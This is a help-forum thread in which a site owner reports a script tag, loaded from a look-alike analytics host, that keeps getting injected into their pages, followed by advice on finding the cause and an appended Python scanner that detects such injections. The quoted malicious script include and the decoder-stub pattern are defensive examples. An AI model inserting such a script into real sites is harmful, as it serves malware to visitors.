Hi Sri,

Contact your hosting provider and have them check the log files or
send them to you, with information on who is tampering with the files.
They should be able to show some kind of entry.

It could either be that it happens through an upload of a file - in
which case your password is likely compromised and possibly your PC
has a keylogger or other malicious software. Or it could happen when a
certain page is accessed a certain way on your site, in which case the
software driving the page (php/asp script) is to blame for this. If
it's your own software then you have to change it, but if it's a
standard package software you might want to get hold of an update.

In any case - check your PC for malicious software capturing your data/
userids/passwords and make sure to change your passwords and change
the uploading service to the home page to a secure ftp or other better
method.

Kent

On Sep 29, 1:45 pm, sri <[EMAIL PROTECTED]> wrote:
> Dear members,
>
> I have posted a question on 13th of
> September, http://groups.google.com/group/stopbadware/browse_thread/thread/96b0c...
>
> After receiving the replies I have removed the unnecessary codes and
> scripts from my site.
> Even though regularly I am getting the same code. I am removing it
> daily.
> I am giving the script which I am removing regularly
>
> <script src="http://analytics-google.info/s/urchin.js";></script>
>
> Can any one of you please tell me how to stop this injection of
> malicious script into my web site.
>
> Thanks in advance
> Sri.
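
An added example, not part of the original thread: a small scanner for a local copy of the site that flags the two markers visible in the injected code (a script loaded from a host the owner does not use, and an inline script that writes `fromCharCode`-decoded content) and reports each file's modification time so it can be matched against the hosting provider's FTP and web logs. The allow-list, file extensions and sample page are assumptions made for the illustration.

```python
import os
import re
import time
from urllib.parse import urlparse

# Assumption: hosts this site really loads scripts from; adjust per site.
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com"}

SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
INLINE_SCRIPT = re.compile(r'<script[^>]*>(.*?)</script>', re.I | re.S)

# Constructed sample page: the look-alike host from the thread plus a harmless decoder stub.
CONSTRUCTED_SAMPLE = (
    '<html><body><script src="http://analytics-google.info/s/urchin.js"></script>\n'
    '<script>document.write(String.fromCharCode(60,98,62))</script></body></html>'
)

def scan_text(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of reasons this page content looks tampered with."""
    findings = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).hostname  # None for relative (same-site) paths
        if host and host.lower() not in allowed_hosts:
            findings.append(f"external script from unlisted host: {host}")
    for body in INLINE_SCRIPT.findall(html):
        # Decoder stub: content rebuilt character by character, then written out.
        if "document.write" in body and "fromCharCode" in body:
            findings.append("inline script writes fromCharCode-decoded content")
    return findings

def scan_tree(root, exts=(".html", ".htm", ".php", ".asp", ".js")):
    """Walk a local copy of the site; return [(path, mtime, findings), ...]."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_text(fh.read())
                if findings:
                    hits.append((path, os.path.getmtime(path), findings))
    return hits

if __name__ == "__main__":
    import sys
    for path, mtime, findings in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
        print(stamp, path, "; ".join(findings))
```

The printed timestamps are the times to ask the hosting provider about: an FTP upload at that moment points to stolen credentials, a web request at that moment points to a vulnerable script.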
You received this message through the Google Groups "stopbadware" group.